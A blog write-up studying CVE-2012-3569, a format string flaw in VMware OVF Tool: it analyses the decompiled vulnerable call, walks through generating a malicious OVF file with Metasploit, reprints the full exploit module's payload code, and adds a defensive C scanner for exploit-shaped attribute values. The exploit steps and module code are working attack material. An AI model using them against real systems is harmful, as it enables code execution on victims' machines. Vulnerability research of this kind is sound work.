CVE-2012-3569 Vulnerability Study

7erry

The Open Virtual Machine Format (OVF) is a virtual machine distribution format that lets virtual machines be shared across different products and organizations. VMware OVF Tool is a free command-line utility from VMware for importing and exporting virtual machines. When parsing an OVF file the tool has a format string vulnerability: an attacker who lures a user into loading a crafted OVF file can achieve arbitrary code execution.

Affected versions:
vmware:ovf_tool:2.1
vmware:workstation:8.0-8.0.4
vmware:player:4.0-4.0.4

Vulnerability Analysis

A format string vulnerability corrupts the stack layout, so opening the sample and starting dynamic analysis from the crash point makes the investigation very hard going. Since format string bugs originate in the arguments handed to print functions, the relevant print functions are a better entry point for the analysis.

Run ovftool.exe under a debugger and open the sample. Look up the hard-coded strings in the constant table, find the functions that reference them, recursively walk the cross-references of those functions, and set breakpoints on every print function. Once ovftool.exe starts to output the value of the sample's ovf:capacityAllocationUnits attribute, single-step from there; shortly before the crash this lands in std::basic_ostream. The documentation defines it as

```cpp
template<
    class CharT,
    class Traits = std::char_traits<CharT>
> class basic_ostream : virtual public std::basic_ios<CharT, Traits>
```

The decompiled fragment of the caller around this call is

```cpp
v36 = v30[5];
v20 = (int (__thiscall **)(_DWORD, _DWORD, _DWORD))(*(_DWORD *)v30[5] + 16);
v21 = (*(int (__thiscall **)(int, int))(*(_DWORD *)v4 + 44))(v4, v19);
v22 = (*v20)(v36, &v28, v21);
v31 = 1;
v23 = v22;
v24 = sub_401A90(&dword_160C7D8, " - ");
v25 = std::operator<<<char,std::char_traits<char>,std::allocator<char>>(v24, v23);
std::basic_ostream<char,std::char_traits<char>>::operator<<(v25, std::endl); // Vulnerability Point
v31 = -1;
std::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string<char,std::char_traits<char>,std::allocator<char>>(&v28);
++v19;
result = (*(int (__thiscall **)(_DWORD))(*(_DWORD *)v4 + 36))(v4);
```

Note that at the Vulnerability Point the code calls the std::basic_ostream::operator<< member function to produce formatted output without checking or filtering the format-string argument that comes from external input, which is the format string vulnerability.

Exploitation

Search MSF for an exploit for this vulnerability

```
msfconsole
msf6 > search cve-2012-3569
```

Search results

```
Matching Modules
================

   #  Name                                           Disclosure Date  Rank    Check  Description
   -  ----                                           ---------------  ----    -----  -----------
   0  exploit/windows/browser/ovftool_format_string  2012-11-08       normal  No     VMWare OVF Tools Format String Vulnerability
   1  exploit/windows/fileformat/ovf_format_string   2012-11-08       normal  No     VMWare OVF Tools Format String Vulnerability


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/fileformat/ovf_format_string
```

Load the module and view its details

```
msf6 > use exploit/windows/fileformat/ovf_format_string
msf6 exploit(windows/fileformat/ovf_format_string) > info
```

Module details

```
msf6 exploit(windows/fileformat/ovf_format_string) > info

       Name: VMWare OVF Tools Format String Vulnerability
     Module: exploit/windows/fileformat/ovf_format_string
   Platform: Windows
       Arch:
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-11-08

Provided by:
  Jeremy Brown
  juan vazquez <juan.vazquez@metasploit.com>

Available targets:
  Id  Name
  --  ----
  => 0  VMWare OVF Tools 2.1 on Windows XP SP3

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.ovf          yes       The file name.

Payload information:
  Avoid: 158 characters

Description:
  This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
  Windows. The vulnerability occurs when printing error messages while parsing a
  a malformed OVF file. The module has been tested successfully with VMWare OVF Tools
  2.1 on Windows XP SP3.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-3569
  OSVDB (87117)
  http://www.securityfocus.com/bid/56468
  https://www.vmware.com/security/advisories/VMSA-2012-0015.html


View the full module info with the info -d command.
```

Use the module to generate the malicious file

```
msf6 exploit(windows/fileformat/ovf_format_string) > set payload windows/exec
msf6 exploit(windows/fileformat/ovf_format_string) > set CMD calc.exe
msf6 exploit(windows/fileformat/ovf_format_string) > exploit
```

MSF then generates the exp.ovf file; luring the target into opening it triggers the exploit.

Exploit Analysis

The module's exploit code is located at

```
/usr/share/metasploit-framework/modules/exploits/windows/fileformat/ovf_format_string.rb
```

The core of the exploit is

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VMWare OVF Tools Format String Vulnerability',
      'Description'    => %q{...},
      'License'        => MSF_LICENSE,
      'Author'         => [...],
      'References'     => [...],
      'Payload'        =>
        {
          'DisableNops' => true,
          'BadChars' =>
            (0x00..0x08).to_a.pack("C*") +
            "\x0b\x0c\x0e\x0f" +
            (0x10..0x1f).to_a.pack("C*") +
            (0x80..0xff).to_a.pack("C*") +
            "\x22",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x54\x59", # push esp # pop ecx
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
              'BufferOffset' => 6
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # vmware-ovftool-2.1.0-467744-win-i386.msi
          [ 'VMWare OVF Tools 2.1 on Windows XP SP3',
            {
              'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
              'AddrPops' => 98,
              'StackPadding' => 38081,
              'Alignment' => 4096
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-11-08',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ovf']),
      ])
  end

  def ovf
    my_payload = rand_text_alpha(4) # ebp
    my_payload << [target.ret].pack("V") # eip # call esp
    my_payload << payload.encoded

    fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
    fs << rand_text_alpha(target['Alignment']) # Align to 0x11000
    fs << my_payload
    # 65536 => 0x10000
    # 27 => Error message prefix length
    fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
    fs << "%08x" * target['AddrPops'] # Reach saved EBP
    fs << "%hn" # Overwrite LSW of saved EBP with 0x1000

    ovf_file = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1"
xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common"
xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"
xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"
xmlns:vmw="https://www.vmware.com/schema/ovf"
xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<References>
<File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
</References>
<DiskSection>
<Info>Virtual disk information</Info>
<Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="https://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
</DiskSection>
<VirtualSystem ovf:id="Small VM">
<Info>A virtual machine</Info>
</VirtualSystem>
</Envelope>
    EOF
    ovf_file
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1")
    file_create(ovf)
  end
end
```

The exploit is short. Following the OVF file format and the logic with which ovftool.exe processes the file, it generates a malicious file whose format-string payload is wrapped in padding characters. The exploitation approach is to hijack the stack frame's return address so that execution jumps to the prepared shellcode; the comments in the module explain the details, so they are not repeated here.
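From the defender's side, the payload shape the module builds (a long run of `%08x` followed by `%hn` inside an attribute value) is easy to recognise before a file ever reaches ovftool. The following triage scanner is an added example written for this post; it is not code from the post, from ovftool or from the Metasploit module. It walks every double-quoted attribute value of an OVF document, parses printf-style directives, and treats any `%n`-family directive as exploit-shaped. The two sample documents are constructed for the example, and the threshold of four read directives for "suspicious" is an assumption, not something the post states.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added triage example (not ovftool or Metasploit code). Scans the attribute
 * values of an OVF/XML document for printf-style directives. */

typedef struct {
    int directives;       /* all %-directives found inside attribute values */
    int write_directives; /* the %n family (%n, %hn, %hhn, %ln): memory writes */
} ovf_scan_result;

/* Parse one printf directive at p (p[0] == '%', p[1] != '%'). Returns the
 * bytes it spans, or 0 if no valid conversion follows; sets *is_write for 'n'. */
static size_t parse_directive(const char *p, int *is_write)
{
    const char *q = p + 1;
    *is_write = 0;
    while (*q && strchr("-+ #0", *q)) q++;                   /* flags */
    while (*q == '*' || isdigit((unsigned char)*q)) q++;     /* width */
    if (*q == '.') {                                         /* precision */
        q++;
        while (*q == '*' || isdigit((unsigned char)*q)) q++;
    }
    while (*q && strchr("hlLqjzt", *q)) q++;                 /* length modifier */
    if (*q && strchr("diouxXeEfFgGaAcspn", *q)) {            /* conversion */
        *is_write = (*q == 'n');
        return (size_t)(q - p) + 1;
    }
    return 0;
}

/* Examine only text between paired double quotes, i.e. attribute values,
 * which is where OVF carries user-supplied strings. Quote pairing is
 * deliberately naive: triage needs no full XML parser. */
static ovf_scan_result scan_ovf_attributes(const char *doc)
{
    ovf_scan_result r = { 0, 0 };
    const char *open = doc, *close;

    while ((open = strchr(open, '"')) != NULL) {
        if ((close = strchr(open + 1, '"')) == NULL)
            break;
        for (const char *c = open + 1; c < close; c++) {
            int is_write;
            size_t n;
            if (*c != '%')
                continue;
            if (c[1] == '%') { c++; continue; }  /* "%%" is a literal percent */
            if ((n = parse_directive(c, &is_write)) == 0)
                continue;
            r.directives++;
            r.write_directives += is_write;
            c += n - 1;                          /* loop's c++ skips the directive */
        }
        open = close + 1;
    }
    return r;
}

/* 0 = clean, 1 = suspicious (a run of read directives such as %08x),
 * 2 = exploit-shaped (any %n-family directive; never legitimate in a unit
 * string). The threshold of 4 is an assumed triage heuristic. */
static int ovf_verdict(const char *doc)
{
    ovf_scan_result r = scan_ovf_attributes(doc);
    if (r.write_directives > 0) return 2;
    if (r.directives >= 4) return 1;
    return 0;
}

/* Constructed samples: a benign disk entry, and the same entry carrying a
 * shortened exploit-shaped value (the module uses 98 "%08x" before "%hn"). */
static const char BENIGN_OVF[] =
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
    "<Envelope xmlns:ovf=\"http://schemas.dmtf.org/ovf/envelope/1\">\n"
    "  <DiskSection>\n"
    "    <Disk ovf:capacity=\"8\" ovf:capacityAllocationUnits=\"byte * 2^30\""
    " ovf:diskId=\"vmdisk1\" ovf:fileRef=\"file1\"/>\n"
    "  </DiskSection>\n</Envelope>\n";

static const char MALICIOUS_OVF[] =
    "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
    "<Envelope xmlns:ovf=\"http://schemas.dmtf.org/ovf/envelope/1\">\n"
    "  <DiskSection>\n"
    "    <Disk ovf:capacity=\"8\" ovf:capacityAllocationUnits=\"AAAAAAAA%08x%08x%08x%08x%hn\""
    " ovf:diskId=\"vmdisk1\" ovf:fileRef=\"file1\"/>\n"
    "  </DiskSection>\n</Envelope>\n";

int main(void)
{
    const char *names[] = { "benign", "malicious" };
    const char *docs[] = { BENIGN_OVF, MALICIOUS_OVF };
    for (int i = 0; i < 2; i++) {
        ovf_scan_result r = scan_ovf_attributes(docs[i]);
        printf("%-9s directives=%d write_directives=%d verdict=%d\n",
               names[i], r.directives, r.write_directives, ovf_verdict(docs[i]));
    }
    return 0;
}
```

Run against the two constructed documents the scanner reports no directives for the benign entry and five directives (one of them a write) for the malicious one. A legitimate `ovf:capacityAllocationUnits` value is a unit expression such as `byte * 2^30`, so any `%n`, `%hn` or `%hhn` in that attribute is a reliable indicator of this exploit family; a long run of `%x`-style reads is weaker evidence and is only flagged as suspicious.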

Fix

The fix is to make the format control string a literal, or at least not controllable from outside. The remediation approach is clear, but the official patch changes a great deal and is inconvenient to analyze, so it is not discussed further.

References

std::basic_ostream
Official Document
Microsoft Vulnerability Research Advisory MSVR13-002
Github - CVE-2012-3569
NVD - CVE-2012-3569
CVE - CVE-2012-3569
漏洞战争 (Vulnerability Wars)

  • Title: CVE-2012-3569 Vulnerability Study
  • Author: 7erry
  • Created at: 2025-01-11 18:53:57
  • Updated at: 2025-01-11 18:53:57
  • Link: https://7erryx.github.io/2025/01/11/Vulnerability Investigation/CVE-2012-3569 漏洞研究/
  • License: This work is licensed under CC BY-NC-SA 4.0.